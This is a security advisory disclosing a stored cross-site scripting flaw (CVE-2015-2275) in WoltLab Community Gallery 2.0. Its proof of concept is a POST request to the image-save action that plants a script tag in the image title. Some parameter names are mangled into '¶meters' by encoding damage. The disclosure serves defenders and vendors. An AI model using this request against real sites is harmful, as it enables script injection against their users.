#Vulnerability title: Community Gallery - Srored Corss-Site Scripting
vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link:
https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong ([email protected]) & ITAS Team (www.itas.vn)
::PROOF OF CONCEPT::
actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&obje
ctIDs%5B%5D=7¶meters%5Bdata%5D%5B7%5D%5BalbumID%5D=1¶meters%5Bdata%5
D%5B7%5D%5BcategoryIDs%5D%5B%5D=3¶meters%5Bdata%5D%5B7%5D%5Bdescription%
5D=test¶meters%5Bdata%5D%5B7%5D%5BenableComments%5D=1¶meters%5Bdata%
5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg¶meters%5Bdata%5D%5B7%5D%5Bfilesize%5
D=47948¶meters%5Bdata%5D%5B7%5D%5Bheight%5D=480¶meters%5Bdata%5D%5B7
%5D%5BimageID%5D=7¶meters%5Bdata%5D%5B7%5D%5Blatitude%5D=0¶meters%5B
data%5D%5B7%5D%5Blongitude%5D=0¶meters%5Bdata%5D%5B7%5D%5Borientation%5D
=1¶meters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing¶meters%5Bdata%5D%
5B7%5D%5BthumbnailHeight%5D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5
D=0¶meters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0¶meters%5Bdata%5D%5B7%5
D%5BthumbnailY%5D=0¶meters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fde
mo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&
parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%
3E¶meters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788
bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg¶meters%5Bdata%5D%5B7%5
D%5Bwidth%5D=640¶meters%5Bdata%5D%5B7%5D%5Blocation%5D=¶meters%5BisE
dit%5D=1
::DISCLOSURE::
http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-bu
rning-board-community-gallery-77.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
ITAS Team (www.itas.vn)